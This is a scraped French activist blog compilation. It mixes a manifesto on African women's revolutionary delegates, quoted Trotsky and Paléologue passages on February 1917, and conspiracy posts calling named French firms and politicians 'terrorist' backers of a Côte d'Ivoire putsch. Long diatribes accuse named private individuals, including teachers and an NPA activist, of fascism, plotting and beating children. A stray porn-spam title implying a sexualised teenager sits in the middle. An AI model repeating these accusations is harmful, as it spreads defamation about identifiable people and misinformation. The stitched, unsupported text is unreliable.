Le quota de 1 délégué pour 500 qui permit l'organisation du pouvoir du peuple en mars 1917 à Petrograd est précurseur de ce que les femmes d'Afrique feront bientôt.
Ce seront 20 millions de femmes qui seront désignées déléguées de  base de CDR Sankara
Ce seront 800 000 femmes qui seront choisies comme déléguées conseillères pour gérer les comités de villes
Ce seront 32 000 femmes qui seront choisies comme déléguées députée pour gérer les comités de région
Ce seront 1280 femmes qui seront choisies comme déléguées nationales pour gérer les comités nationaux
Ce seront 51 femmes qui seront choisies comme déléguées internationales pour le CIRAF, Comité International de la Révolution Africaine
Un gouvernement d'Afrique qui imposera un prix égaliste aux impérialistes, qui créera un Nuremberg de l'Afrique pour juger les criminels

LIRE CET ARTICLE CONDAMNE DANS 5 TRIBUNAUX FRANCAIS POUR ATTEINTE A LA VIE PRIVEE DU BARBOUZE QUI ORGANISA LE RENVERSEMENT DE GBAGBO A PARTIR DE LA 1° ATTAQUE TERRORISTE LE 16 DECEMBRE 2010

DIMANCHE 2 JANVIER 2011


Les femmes seront, avec les jeunes et les paysans pauvres les phares de la révolution africaine.
Comme les femmes de Petrograd le furent en 1917



La journée du mardi 6 mars 1917 (23 février calendrier russe)
Maurice Paléologue :
Pétrograd manque de pain et de bois ; le peuple souffre.
Ce matin, devant une boulangerie de la Liteïny, j'étais frappé de l'expression mauvaise que je lisais sur les figures de tous les pauvres gens qui faisaient la queue et dont la plupart avaient passé là toute la nuit.
La journée du jeudi 8 mars 1917 (23 février calendrier russe)
Maurice Paléologue :
Toute la journée, il y a eu de l’effervescence à Pétrograd... Des cortèges populaires parcouraient les grandes avenues. Sur plusieurs points, la foule a crié : « Du pain et la paix ! » Sur d'autres, elle a entonné la Marseillaise Ouvrière. Quelques bagarres se sont produites à la Perspective Newsky.
Malgré le vent d'émeute qui souffle dans la capitale, l'empereur qui vient de passer deux mois à Tsarskoïé-Sélo est parti ce soir pour le grand quartier général.
Léon Trotsky :
Le 23 février, c'était la " Journée internationale des Femmes ". On projetait, dans les cercles de la social-démocratie, de donner à ce jour sa signification par les moyens d'usage courant : réunions, discours, tracts. La veille encore, il ne serait venu à la pensée de personne que cette " Journée des Femmes " pût inaugurer la révolution. Pas une organisation ne préconisa la grève pour ce jour-là. Bien plus, une organisation bolcheviste, et des plus combatives, le Comité du rayon essentiellement ouvrier de Vyborg, déconseillait toute grève. L'état d'esprit des masses d'après le témoignage de Kaïourov, un des chefs ouvriers du rayon, était très tendu et chaque grève menaçait de tourner en collision ouverte. Mais comme le Comité estimait que le moment d'ouvrir les hostilités n'était pas encore venu – le parti n'étant pas encore assez fort et la liaison entre ouvriers et soldats étant trop insuffisante – il avait donc décidé de ne point faire appel à la grève, mais de se préparer à l'action révolutionnaire pour une date indéterminée. Telle fut la ligne de conduite préconisée par le Comité à la veille du 23, et il semblait que tous l'eussent adoptée. Mais le lendemain matin, en dépit de toutes les directives, les ouvrières du textile quittèrent le travail dans plusieurs fabriques et envoyèrent des déléguées aux métallos pour leur demander de soutenir la grève. C'est " à contrecœur ", écrit Kaïourov, que les bolcheviks marchèrent, suivis par les ouvriers mencheviks et socialistes-révolutionnaires. Mais du moment qu'il s'agissait d'une grève de masse, il fallait engager tout le monde à descendre dans la rue et prendre la tête du mouvement : telle fut la résolution que proposa Kaïourov, et le Comité de Vyborg se vit contraint de l'approuver. " L'idée d'une manifestation mûrissait depuis longtemps parmi les ouvriers, mais, à ce moment, personne ne se faisait encore une idée de ce qui en sortirait. "  Prenons bonne note de ce témoignage d'un participant, très important pour la compréhension du mécanisme des événements.
On croyait d'avance que, sans le moindre doute, en cas de manifestation, les troupes devraient sortir des casernes et seraient opposées aux ouvriers. Qu'allait-il se passer ? On est en temps de guerre, les autorités ne sont pas disposées à plaisanter. Mais, d'autre part, le soldat de la " réserve ", en ces jours-là, n'est déjà plus celui que, jadis, l'on a connu dans les cadres de l’" active "  . Est-il vraiment si redoutable ? A ce sujet, on raisonnait beaucoup dans les cercles révolutionnaires, mais plutôt abstraitement, car personne, absolument personne – on peut l'affirmer catégoriquement d'après tous les documents recueillis – ne pensait encore que la journée du 23 février marquerait le début d'une offensive décisive contre l'absolutisme. Il n'était question que d'une manifestation dont les perspectives restaient indéterminées et, en tout cas, fort limitées.
En fait, il est donc établi que la Révolution de Février fut déclenchée par les éléments de la base qui surmontèrent l'opposition de leurs propres organisations révolutionnaires et que l'initiative fut spontanément prise par un contingent du prolétariat exploité et opprimé plus que tous les autres – les travailleuses du textile, au nombre desquelles, doit-on penser, l'on devait compter pas mal de femmes de soldats. La dernière impulsion vint des interminables séances d'attente aux portes des boulangeries. Le nombre des grévistes, femmes et hommes, fut, ce jour-là, d'environ 90 000. Les dispositions combatives se traduisirent en manifestations, meetings, collisions avec la police. Le mouvement se développa d'abord dans le rayon de Vyborg, où se trouvent les grosses entreprises, et gagna ensuite le faubourg dit " de Pétersbourg ". Dans les autres parties de la ville, d'après les rapports de la Sûreté, il n'y eut ni grèves, ni manifestations. Ce jour-là, les forces de police furent complétées par des détachements de troupes, apparemment peu nombreux, mais il ne se produisit point de collisions. Une foule de femmes, qui n'étaient pas toutes des ouvrières, se dirigea vers la Douma municipale pour réclamer du pain. Autant demander du lait à un bouc. Dans divers quartiers apparurent des drapeaux rouges dont les inscriptions attestaient que les travailleurs exigeaient du pain, mais ne voulaient plus de l'autocratie ni de la guerre. La " Journée des femmes " avait réussi, elle avait été pleine d'entrain et n'avait pas causé de victimes. Mais de quoi elle était lourde, nul ne se doutait encore dans la soirée.

Lire la suite de la narration de Leon Trotsky et de Maurice Paléologue



MERCREDI 9 MARS 2011



MERCREDI 16 MARS 2011








          FillonGATE : La liste des entreprises terroristes receleurs du putsch Soro Ouattara   
par Yanick Toutain
REVACTU
17 février 2017



« notre part de marché baisse,
mais la taille du gâteau augmente.
 Si notre part baisse,
c’est parce que de plus en plus de monde
 s’intéresse à la Côte d’Ivoire,
 et c’est bon signe pour nous »
.
Jean-Christophe Belliard,
ancien directeur Afrique au ministère 
des Affaires étrangères


ENTREPRISES VOYOUS RECELEURS
DU PUTSCH TERRORISTE SORO OUATTARA

Bolloré Africa logistics  Sitarail, Air France CMA-CGM Airbus  Orange
Canal + (Vivendi) Société générale (SGBCI)  BNP Paribas (BICICI)  Axa
  société Franzetti du groupe Veolia  Bouygues société Matière sociétés Fayat et Vinci
Danone, Castel et La Compagnie fruitière , groupe antillais Bernard Hayot
  Touton et Cémoi Bel Carrefour  A
ccor Total  Alstom 
Eranove  ( CIPREL+Compagnie ivoirienne d’électricité (CIE)  SODECI..) Engie  Raidco Marine Thalès


LIRE AUSSI

ENTRETIENS DE ROYAUMONT
 CAMOUFLAGE DES ENTREPRISES VOYOUS
RECELEURS DU PUTSCH TERRORISTE EN CÔTE D'IVOIRE


Fillon a reçu 200 000 € de AXA par sa société écran 2F Conseil
C'était évidemment la corruption en remerciement de l'installation des terrroristes en Côte d'Ivoire
Sarkozy et Fillon agissaient sur instruction de Johnnie Carson pour téléguider les milices dozos dont Henri de Castries a été intronisé chef coutumier par celui qui organisait dès le printemps 2010 les premières tentatives (ratées) de trucage des élections, le terroriste Beugré Mambé qu'on voit sur la photo.


Mais on découvre d'autres circuits de corruption terroriste.
On apprend aujourd'hui


Invité à quatre reprises à l’étranger par les Entretiens de Royaumont - à Varsovie en 2014, Madrid en 2015, Abou Dhabi et Rabat en 2016 - François Fillon aurait été rémunéré pour sa participation à chacun de ces déplacements. Contrairement aux autres intervenants. Libération a interrogé plusieurs d’entre eux, qui ont confirmé n’avoir obtenu aucune gratification. (Ouest France)

Donc les entreprises terroristes ont trouvé le moyen de sponsoriser Fillon indirectement !!!

Quel est donc cette mystérieuse organisation ?

LE RENDEZ-VOUS MONDIAL DE LA REFLEXION ? GAG !

Commencez par ne pas croire Google

Lisons plutôt Wikipédia que ces voyous capitalistes se prenant pour des intellectuels


Jérôme Chartier relance en 2003, avec le soutien de Serge DassaultCharles MilhaudJean-Luc Decornoy et Vincent Montagne, le cycle des Entretiens de Royaumont qu'avait créé en 1947 Henry Goüin et qui avait disparu durant les années 1960.
Carole Vézilier Commissaire Générale et Jean-Pierre Yalcin, Commissaire Général adjoint de la manifestation lancent en novembre 2013, au château royal de Varsovie la première édition des « Entretiens de Varsovie », directement inspirés des « Entretiens de Royaumont », et organisés par la Chambre de commerce et d'industrie française en Pologne (CCIFP) sous le patronage de l'Ambassade de France, du Sénat de la République de Pologne et de la Fondation Jean Monnet pour l'Europe1. De même, se déroulent à partir de 2014 les « Entretiens de Madrid » et les « Entretiens de Casablanca », tout deux issus de ceux de Royaumont2.
Quelles sont leurs réflexions ?


  • 2003 : « La France recule-t-elle ? »
  • 2004 : « La politique est-elle un métier ? »
  • 2005 : « Faut-il partir pour réussir ? »
  • 2006 : « Et si vous étiez président de la république ? »
  • 2008 : « Structurer la croissance française »
  • 2009 : « Rêvons le capitalisme »
  • 2010 : « Réussir la France 2030 »
  • 2011 : « Aimer la France »
  • 2012 : « Réinventer le travail »
  • 2013 : « Nouveaux pays émergents : construire une relation durable »
  • 2014 : « Impôts, dette publique, croissance: construire un triangle vertueux »
  • 2015 : « Et vous, comment êtes-vous Green ? »
  • 2016 : « Croyant et citoyen »
On remarque que pour 2012 il s'agit de maintenir les salaires africains à 50 euros
et que pour 2013 il s'agit de se congratuler pour l'envoi réussi de jihadistes au Mali !

Logique pour ces patrons terroristes d'inviter les idéologues de DAECH
Parmi les invités, on trouve deux membres de l’UOIF : le recteur de la Grande Mosquée de Bordeaux (et proche d’Alain Juppé) Tarek Oubrou et El Hassan Oukfer, directeur du lycée « Avérroes », piloté officiellement par les Frères Musulmans. Est également présent Anouar Kbibech, l’actuel président du CFCM, issu du MUR (les Frères Musulmans Marocains). Les Frères Musulmans, dont l’UOIF est l’émanation en France, sont considérés comme une organisation terroriste dans plusieurs pays du monde. (source)

Mais l'essentiel ce sont les sponsors
Les Entretiens de Royaumont offrent la possibilité chaque année à quelques entreprises de rejoindre le cercle restreint de leurs partenaires de soutien.Cette démarche personnelle marque la volonté pour une entreprise de contribuer à soutenir le débat public où le monde économique, politique, culturel et social se retrouvent ensemble pour construire l’avenir d’une société empreinte de justice, d’équité et de liberté.Vous souhaitez devenir un partenaire engagé dans cette démarche inédite en France ? Adressez-nous ce formulaire, nos équipes prendront contact avec vous 

Seulement voilà quand on regarde les entreprises partenaires, on découvre des figurants et.... les principales entreprises voyous receleurs du putsch terroriste en Côte d'ivoire
AXA, TOTAL, BNP AIRBUS VINCI ET ORANGE
:

Des entreprises terroristes dont la liste est utilement donnée par Philippe Cochet
« Le but de ce rapport est de lever les idées toutes faites sur la Côte d'Ivoire », indique Philippe Cochet, le président de la mission d'information sur la Côte d'Ivoire. Le document revient en détail sur les problèmes fonciers, sur l'économie du pays et notamment sur la tendance pour Abidjan à nouer des partenariats avec des interlocuteurs Chinois, Marocains et Nigerians. Ce rapport livre par ailleurs une observation détaillée de la vie politique ivoirienne. 
Ne cherchez pas dans ce rapport voyou et mensonger mention de l'attaque de la télévision ivoirienne par les terroristes de Soro sous la protection des miliciens ONUCI de Jean-Marie Bourry
 Tout ce qui est mentionné dans le rapport, à part cette liste est partial.
Chaque crime imputé (logiquement) aux terroristes de Sarkozy Fillon Johnnie Carson Clinton, ce crime est noyé dans une incrimination des victimes d'un putsch depuis 2002



- Des positions clés dans plusieurs secteurs Tous les grands groupes français traditionnellement présents en Afrique sont implantés en Côte d’Ivoire. Ces filiales occupent des positions très importantes dans la plupart des secteurs de l’économie ivoirienne.
Dans le transport, Bolloré Africa logistics est un acteur important du trafic maritime. Il est concessionnaire du quai conteneurs sur le port d’Abidjan et adjudicataire du futur second terminal sur ce port qui devrait être opérationnel en 2018. Celui-ci sera réalisé par des entreprises chinoises, sur financement chinois. Bolloré est également positionné dans le transport ferroviaire à travers sa filiale Sitarail, qui exploite la ligne de chemin de fer reliant Abidjan à Ouagadougou. D’autres groupes comme Air France ou la CMA-CGM (transport maritime) sont également implantés. La compagnie Air Côte d’Ivoire a passé commande auprès d’Airbus pour cinq appareils livrables entre 2017 et 2021.
Orange est leader du marché de la téléphonie fixe et mobile en Côte d’Ivoire et s’appuie sur sa filiale ivoirienne pour réaliser une part de son expansion en Afrique de l’ouest. L’entreprise a notamment créé à Abidjan le plus grand centre de traitement des données d’Afrique de l’ouest. Dans le domaine de la télévision par câble et par satellite, Canal + (Vivendi) était jusqu’à présent en situation de monopole, étant le seul opérateur autorisé par la Haute autorité de la communication audiovisuelle (HACA) ivoirienne. Celle-ci a cependant ouvert ce secteur à la concurrence du chinois Startimes et de deux sociétés ivoiriennes en mars dernier. Actuellement, Canal + compte 300 000 abonnés à son bouquet de 200 chaînes dans le pays.
Dans le secteur bancaire, les entreprises françaises ont perdu du terrain face aux banques marocaines, mais la filiale de la Société générale (SGBCI) reste la première banque du pays. Elle vient d’ailleurs d’ouvrir une salle de marchés régionale à Abidjan chargée de gérer les activités de change de l’ensemble des filiales du groupe dans l’UEMOA et peut-être, à terme, dans toute l’Afrique subsaharienne. La filiale de BNP Paribas (BICICI) est quant à elle la quatrième banque du pays. Au total, les banques françaises sont à égalité avec les banques marocaines pour le montant des crédits accordés. Axa est présente dans le secteur des assurances.
Dans le secteur du BTP, la société Franzetti du groupe Veolia est restée active malgré la crise. Le groupe Bouygues occupe également une place de premier plan ; il a notamment réalisé la construction du troisième pont d’Abidjan (le pont Henri Konan Bédié) et devrait participer à la construction du métro d’Abidjan à travers un consortium franco-coréen. Par ailleurs, la société Matière a décroché un contrat pour la construction de treize ponts métalliques en milieu rural, financée par un prêt du Trésor. Les sociétés Fayat et Vinci sont également présentes.
Dans le domaine agro-alimentaire, DanoneCastel et La Compagnie fruitière sont bien implantées en Côte d’Ivoire. Le groupe antillais Bernard Hayot a relancé la concurrence en investissant dans la culture de bananes. Dans le secteur de la transformation du cacao, à côté des géants américain (Cargill), suisse (Nestlé), singapourien (Olam), les Français Touton et Cémoi sont présents et occupent une place certes proportionnellement modeste. Cependant, Cémoi a ouvert en 2015 la première usine de fabrication de chocolat du pays. Il était ainsi le premier acteur à maîtriser l’ensemble de la filière, de la fève au chocolat. Bel a par ailleurs ouvert en mars 2016 une usine pour produire la Vache qui rit en Côte d’Ivoire.
Dans le secteur de la distribution, Carrefour a ouvert, en partenariat avec CFAO, désormais japonais, son premier hypermarché en Afrique subsaharienne au sein du nouveau centre commercial Playce Marcory. Un deuxième Carrefour devait ouvrir en janvier 2017 à Abidjan. Accor est un acteur prépondérant du secteur de l’hôtellerie ivoirienne, où toute sa gamme d’hôtels est représentée.
Dans le secteur de l’énergie, Total est leader dans la distribution, le trading et l’exploration-production en Côte d’Ivoire. Alstom a conclu un contrat pour la fourniture de quatre turbines dans le cadre de la réalisation du barrage de Soudré qui est assurée par le Chinois SynoHydroEranove est un acteur majeur du secteur de l’électricité à la fois pour la production, à travers sa filiale CIPREL, et pour le transport et la distribution, par sa participation dans la Compagnie ivoirienne d’électricité (CIE). Le groupe est par ailleurs actionnaire de la Société de distribution d’eau de Côte d’Ivoire, la SODECI. Enfin, Engie a installé son premier bureau en Afrique de l’ouest à Abidjan en janvier 2016 et aurait des projets d’investissements dans les domaines du gaz naturel liquéfié (GNL) et des centrales à gaz.
Enfin, dans le domaine de la défense, l’entreprise Raidco Marine a livré trois patrouilleurs au ministère de la défense en 2015 et Thalès a été retenu pour fournir un système de suivi, de contrôle et de surveillance maritime pour le ministère de la production animale et des ressources halieutiques. Le groupe est par ailleurs en négociation pour la fourniture d’un système de vidéosurveillance pour Abidjan dans le cadre d’un consortium avec le Chinois Huawei.


On voit les vautours esclavagistes se repaitre


Cependant, d’après les statistiques données par la Direction générale du Trésor, les entreprises françaises continuent aujourd’hui à occuper une place centrale dans l’économie ivoirienne. La France conserve de loin le principal stock d’investissements directs étrangers sur le sol ivoirien, avec 1,6 milliard de dollars pour un stock total de 7,7 milliards en 2014, soit une part de 21%. Le deuxième investisseur en termes de stock était en 2014 les Pays-Bas, avec 12% du total.
Les entreprises françaises jouent un rôle essentiel dans l’économie formelle de la Côte d’Ivoire. Elles représenteraient environ un tiers du PIB ivoirien et entre 40 et 50% des recettes de l’impôt sur les sociétés. Au total, entre 600 et 700 entreprises françaises seraient implantées dans le pays dont 160 filiales de grands groupes qui emploient près de 35 000 personnes. Ces filiales font de plus en plus de la Côte d’Ivoire un « hub » pour leurs activités dans la région, à l’instar d’Orange ou d’Engie. En 2015, les entreprises françaises auraient totalisé 20% du stock et 37% du flux des investissements en Côte d’Ivoire.
Les petites et moyennes entreprises commenceraient tout juste à revenir après l’hémorragie de la crise ivoirienne. On dénombre aujourd’hui environ 400 PME de droit local ivoirien créées par des Français. Il semble pourtant que la « reconquête des PME françaises » soit encore à venir. En témoigne, la délégation importante conduite par Pierre Gattaz, président du Medef à Abidjan en avril dernier. Celle-ci comptait 130 chefs d’entreprise dont 75% de PME.
Pour Jean-Christophe Belliard, ancien directeur Afrique au ministère des Affaires étrangères, la présence économique française en Côte d’Ivoire ne doit pas être perçue sous l’angle du déclin : « notre part de marché baisse, mais la taille du gâteau augmente. Si notre part baisse, c’est parce que de plus en plus de monde s’intéresse à la Côte d’Ivoire, et c’est bon signe pour nous ».

Les médias vous cacheront la vérité.
Hollande a continué exactement la même politique !!




          Teenage Boy Exploiting Girlfriends Shaved Pussy   
Watch Teenage Boy Exploiting Girlfriends Shaved Pussy at XXXPorn.rs - best free online XXXPorn videos for you to enjoy.
          Vincent Alès un des fascistes Franceàfric NPA qui ont organisé la révocation de Julie Amadis va jouer les provocateurs pro migrants près d'un groupe de militants Front national   

par Yanick Toutain
L'Havrais Vérité
9/11/2016

Voici l'acte de révocation que le groupe fasciste NPA du Havre et leurs complices SNUIPP UNSA CGT ont préparé en réunions secrètes préalables au conseil de discipline au service de Bolloré et de la contre révolution anti Afrique


"Considérant que les multiples déclarations publiques de Mme Julie AMADIS telles que : « Les juges de la Cour d'Appel de Bordeaux ont multiplié les mensonges et faux en écriture ». « Les militaires tuent, des femmes, des hommes, des enfants [...] Défendre l'État français actuellement, c'est défendre cette ignominie. », ou « L'État français est tellement raciste qu'il ne fait pas confiance à l'extrait d'acte de naissance d'un jeune homme africain.» sont un manquement grave de l'obligation de réserve et une atteinte à la République Française (extrait acte de révocation)"


LIRE AUSSI

Il manque une prof à l'école Robespierre Caucriauville Le Havre ! Logique ! Julie Amadis milite contre les violences à enfants, contre Belkacem et Hollande et contre Bolloré et pour la révolution africaine sur le programme de Thomas Sankara


présentation Yanick Toutain
L'Havrais Vérité
2/9/2016



Julie Amadis : "Je suis Professeur des Ecoles.
Exclue 2 ans en juillet 2014
 pour avoir dénoncé des violences à enfants
(motif officiel mensonger :
avoir distribué les tracts des parents d'élèves
- le témoin, menteur, est Léon Launay
 qui ment sous la menace de Monique Béaur
qui se sert de lui comme une marionnette mensongère)

J'ai été révoquée en juillet 2016
pour "atteinte à la République Française",
 je n'ai pas fait de rentrée aujourd'hui."



Les voyous qui dirigent la France protègent les profs agresseurs du Havre.
La directrice de l'école maternelle Varlin, Véronique Combret, qui se vantait en janvier 2008 de frapper un enfant de 4 ans.
Celui de l'école Valmy qui frappe, avec la main ou des objets divers, qui tire les cheveux, les oreilles depuis 1993 - Léon Launay
C'est dans son école que Hollande et Peillon ont nommé Julie Amadis en septembre 2013.

LES SERVICES SECRETS FRANCAIS REGLENT LE COMPTE D'UNE ACTIVISTE DE LA REVOLUTION AFRICAINE




Ce qui suit est le commentaire publié sur Youtube sous la vidéo.

Vincent Alès qui REFUSE depuis 20 ans de MILITER pour TROUPES FRANCAISES hors d'Afrique, qui SOUTENAIT le barbouze fasciste terroriste ONUCI Jean Marie Bourry (qui a aurait eu raison d'INVOQUER sa prétendue VIE PRIVEE en me faisant condamner à 31000€TGI D'ANGOULEME puis 33000€ Cour d'Appel de Bordeaux puis 35000€ Cour d'Appel de Rouen)Vincent Alès qui REFUSE de militer pour le SMIC en AFRIQUEVincent Alès qui participe au COMPLOT contre Julie Amadis (qui a participé à une REUNION SECRETE en 2014 de membres du conseil de discipline pour DECIDER à l'avance de son EXCLUSION ou NON)Vincent Alès qui est un ennemi de la révolution africaine se rend compte tout à coup qu'il y a des humains au delà des frontières de son petit pays la France dans lequel il réclame toujours plus de SALAIRES (sur le dos des Africains)Vincent Alès ..... se découvre tout à coup -dans le cerveau - 5 milligrammes de compassion altruiste pour les "migrants" se précipite alors TOUT à CÔTE de militants FN pour y jouer les cow-boys anti-fascistes..... ALORS QUE LES PIRES FASCISTES ACTUELLEMENT dans la répression contre-révolutionnaire contre Julie Amadis sont Vincent Alès et ses "camarades" Franceàfric SNUIPP, UNSA et CGT..... tous complices des terroristes Guillaume Soro et Jean-Marie Bourryà noter que le protégé (Soro) de celui (Bourry) qui a fait condamner Julie Amadis vient de se faire attraper au téléphone en train d'organiser des attaques jihadistes Ansardinehttps://www.youtube.com/watch?v=d_DWOYjw9M4Vincent Alès ira sans doute prétendre que faire des écoutes téléphoniques de putschistes organisant des attaques jihadistes c'est AUSSI une ATTEINTE à la vie privée ! xxx Vincent Alès petit mercenaire de Belkacem est maintenant celui de Georges Soros et de sa campagne : invitons les mercenaires DAECH à s'implanter en Europe.Elles seront indispensables pour ECRASER LA REVOLUTION EUROPEENNEVincent Alès s'en contrefiche, lui il est du côté de LEON LAUNAY l'instit agresseur d'enfants de l'école ValmyVincent Alès se contrefiche d'ailleurs de TOUS les enfants.....Comme il s'autorise à brutaliser ses élèves, il réclame et participe à la répression des témoins ..... de violences dans les écoles ! Vincent Alès 2008http://monsyte.blogspot.fr/2008/11/lettre-vincent-ales-militant-lcr-npa-ou.htmlVincent Alès 2010http://revolisationactu.blogspot.fr/2010/02/pour-le-npa-lafrique-nexiste-plus.htmlJ'avais déjà raconté de quelle façon le (plutôt sympathique) militant LCR-NPA Vincent Alès m'avait, un jour, présenté - retrouvé au fond de son sac - l'auto-collant "TROUPES FRANCAISES HORS D'AFRIQUE"..... en souriant. J'avais raconté aussi comment ma question "Et vous en collez ?" avait eu un sourire comme réponse. Il est vrai qu'il était le principal militant LCR que je "harcelais" depuis son adhésion à la JCR, puis à la LCR sur le fait que cette revendication était une des revendications prioritaires de n'importe quel parti se prétendant révolutionnaire (marxiste, communiste ...). Vincent Alès 2014 savait 2 ANS à l'AVANCE que Julie Amadis allait être révoquéehttp://lhavraisverite.blogspot.fr/2014/04/cest-officiel-maintenant-le-syndicat.htmlC'est officiel maintenant : le syndicat SNUIPP refuse de soutenir les témoins d'agressions d'enfants dans les écoles « Ils vont te virer » annonce Vincent Alès à Julie Amadis




COMPLEMENT 20 ANNEES DE MAGOUILLES POLITIQUES ET D'ARRIVISME FORMOIS ONT ABOUTI à TRANSFORMER UN JEUNE REVOLUTIONNAIRE DE 1995 EN FASCISTE CYNIQUE ET ARROGANT AU SERVICE DE BOLLORE ET DE LA POLITIQUE TERRORISTE DE SARKOZY HOLLANDE EN AFRIQUE

LUNDI 24 NOVEMBRE 2008


Lettre à Vincent Ales, militant LCR NPA ou comment accuser son chien d'avoir la rage.


Lettre à Vincent Alès, militant LCR NPA ou comment accuser son chien d'avoir la rage.

Par Yanick Toutain
22 23/11/08 20:10

Je te connais depuis 1995. Cela fait donc 13 ans que je te remonte régulièrement les bretelles au nom des traditions du trotskysme.
Cela fait 13 ans, depuis le mouvement de décembre 1995 que j'ai commencé à remonter les bretelles des militants JCR qui bafouaient le terme de "coordination", qui utilisaient, de façon scandaleuse, le mot "coordinations" quand il ne s'agissait que de comités croupions réunissant 3 à 5 personnes.
Ils étaient libres de s'appeler "comité de mobilisation" ou "comité de lutte".
Mais en aucune façon "coordination" qui était le vocabulaire moderne pour des soviets formés de délégués révocables.
Pendant 13 ans, par période, tu acceptas le débat, tu acceptas d'argumenter.
Rares furent ceux qui - membres de la LCR - acceptèrent de chercher à argumenter comme tu le tentas.

De la même façon, nous eûmes, de façon répétée, lors de rencontres impromptues - défilés, rassemblement, réunions etc.. - un débat similaire sur l'ancienne tradition internationaliste de la LCR qui consistait à protester vigoureusement sur les interventions militaires de la France en Afrique.

Tu cherchas à argumenter que la LCR n'avait pas réellement abandonné ce combat.
En 1996, lors d'une nouvelle intervention de l'armée française - en Centrafrique, je crois - nous avions, à deux, avec un autre militant lycéen proche des JCR, construit un tract en utilisant un vieux numéro de Rouge, quand le Rouge du moment avait cessé de préconiser une nouvelle fois l'injonction immédiate "Troupes françaises hors d'Afrique".

J'ai même le souvenir que la dernière fois, fièrement, et avec un sourire, tu sortis de ton sac un auto collant "troupes françaises hors d'Afrique".
Ce à quoi je répondis que c'était une bonne chose à condition que cela ne reste pas un auto collant dans un sac et devinent une véritable campagne de long terme.

Nous eûmes d'autres désaccords sur lesquels je ne cherchais pas à faire de la polémique énergique : en particulier mon total désaccord sur tes imbécillités aventuristes et minoritaires de la fac de Caen.

J'évitais de creuser un fossé sur ce passé révolu. De même sur le cours opportuniste de la LCR qui l'amena à construire des UNEF et des SUD, en recrutant dans les éléments les plus droitiers, devenus constructeurs immobiliers et brutes inqualifiables - frappant leurs propres enfants.
Ce recrutement droitier dans la proto-formoisie arriviste permit à la LCR de justifier son cours de plus en plus droitier : dissolution des JCR locales, construction de l'UNEF rectifié partiellement par la construction de SUD. Ce recrutement droitier d'étudiants de la droite formoise qui deviendront des parents indignes permit à la LCR de trouver de faux prétextes pour ne pas chercher à soutenir les jeunes pauvres de quartiers.
Votre base sociale de "rebelles" pavillonnaires craignait d'être confrontée à la misère qui procura le niveau de vie de leurs parents. Il fallut bien que la bourgeoisie attaque le niveau de vie des plus pauvres pour que la moyenne et le haute formoisie qui sont votre base sociale puisse préserver LEUR niveau de vie et faire construire.
Votre base sociale refusait d'aller faire défiler les étudiants au milieu des HLM des quartiers pauvres.
En 1995, AC (Agir contre le Chômage) ne voulait pas défiler au milieu des HLM.
Pendant 13 ans vous avez, mobilisation après mobilisation, refusé d'aller défiler, en périphérie, au milieu des HLM ! Les plus sincères des militants LCR avouaient avoir peur des pauvres, avouaient qu'ils craignaient de déclencher des émeutes.
Les émeutes eurent lieu malgré vous, sans vous ... à cause de vous !
A cause de votre base sociale qui a fait dégénérer la LCR !
En 1995, l'ANPE locale, une assemblée générale de plusieurs centaines de chômeurs vota en faveur d'un tel défilé : la fraction AC, d'un seul geste, 13 mains se levèrent pour voter contre.
Et pour exiger un nouveau débat quand ils virent à quel point ils étaient minoritaires : les magouilles ordinaires de la formoisie, les magouilles ordinaires de la base des sympathisants LCR !
Ce sont vos magouilles, les magouilles de la LCR qui cassent les mouvements.
Votre refus d'ancrer les mobilisations dans les quartiers les plus pauvres est précisément le fait de votre base sociale.
Votre camarade de l'UNEF, votre sympathisante, ta copine Mélanie V., qui revendique taper ses enfants, elle allait finir par se rendre dans les quartiers des pauvres. Elle ne l'avait pas choisi. Elle allait finir par s'y rendre avec un statut de professeur fonctionnaire. De professeur titulaire. Mais ce fut pour aller y justifier que la Véronique Combret avait le droit de taper le petit Luciano, pour donner raison aux directrices brutales qui tapent les petits enfants des pauvres !
Une base sociale d'étudiants qui refusent de soutenir les pauvres, d'aller défiler dans leurs quartiers. Mais bien contente d'y avoir un poste quand il s'agit d'y gagner du fric !
Pendant le mouvement CPE, ta copine Mélanie V. eut même le culot de venir agresser verbalement Julie Amadis qui voulait faire voter une motion en faveur de tel défilé dans les quartiers.
"Il fallait s'allier avec ces jeunes-là" défendait encore, en 2006, Julie Amadis pendant les AG anti-CPE.
C'était ce que les tracts égalitaristes revendiquaient.
Et la brute Mélanie V. faisait campagne contre de tels défilés.
Elle défendait les privilèges de la formoisie, elle combattait uniquement le plan CPE dans ce qui risquait de toucher les privilégiés.

La boucle est bouclée !

Vos sympathisants collaborent avec l'administration pour défendre le droit de cogner les petits enfants de trois ans !!!
Vos sympathisants règlent leurs comptes politiques en manipulant l'administration.
Car nul n'est dupe : derrière Véronique Combret, derrière Carole Hervieu, on trouve la RASED Anne Dutilloy qui a laissé son petit élève Kévin se faire cogner sans rien dire, derrière les brutes on trouve la main de Mélanie V.
La LCR règle ses comptes en manipulant les tribunaux....
Plainte de Véronique Combret, plainte de Carole Hervieu.
Mais aussi, le premier mai, menace de plainte de Dominique Delahaye, menaces de plainte de Patrice Vérin et de votre candidate LCR NPA Sylvie Vérin.
Vous utilisez la bourgeoisie pour mener votre propre lutte des classes.
Dans l'ombre !

Les repentis de vos magouilles n'ont pas fini de nous révéler toutes les magouilles commises par votre organisation qui abrite, qui protège des crapules néo staliniennes

Voilà à quoi aboutit votre cours droitier, voilà à quoi aboutit le recrutement par l'UNEF et SUD de gens ayant perdu leur humanité : vos sympathisants, la cour électorale de votre candidat LCR aux municipales étaient des brutes qui revendiquent le droit de cogner les enfants, le droit de cogner leurs enfants, le droit pour les directrices d'école maternelle de cogner les petits enfants de 4 ans -Luciano, le droit pour les ATSEM femmes de ménage y travaillant de taper les petits enfants de trois ans - Kévin.
Ton organisation n'a pas levé le petit doigt pour défendre Julie Amadis lorsqu'elle fut menacée de licenciement, puis ; de facto, licenciée par non-renouvellement de contrat.
La LCR locale, sous l'égide de son leader droitier François Leroux, s'est certainement réjouie de voir être licenciée la dénonciatrice.
Celui-ci a du savourer la victoire de sa sympathisante Mélanie V. qui revendique taper ses enfants. Elle avait mené campagne, au collège Varlin, contre Julie Amadis. Elle avait mené campagne pour dissuader les autres professeurs de la soutenir contre la directrice Carole Hervieu et l'inspecteur Patrick Deplanque.
Votre sympathisante, après le départ du collège de son représentant syndical habituel Alain Ponvert - lassé de l'attitude antisyndicale de la principale Carole Hervieu, s'est retrouvée elle-même "responsable" syndicale du collège.
C'est donc votre sympathisante Mélanie V. qui fut la leader de l'offensive réactionnaire formoise pour obtenir le départ, le licenciement, le non-renouvellement du contrat de Julie Amadis.
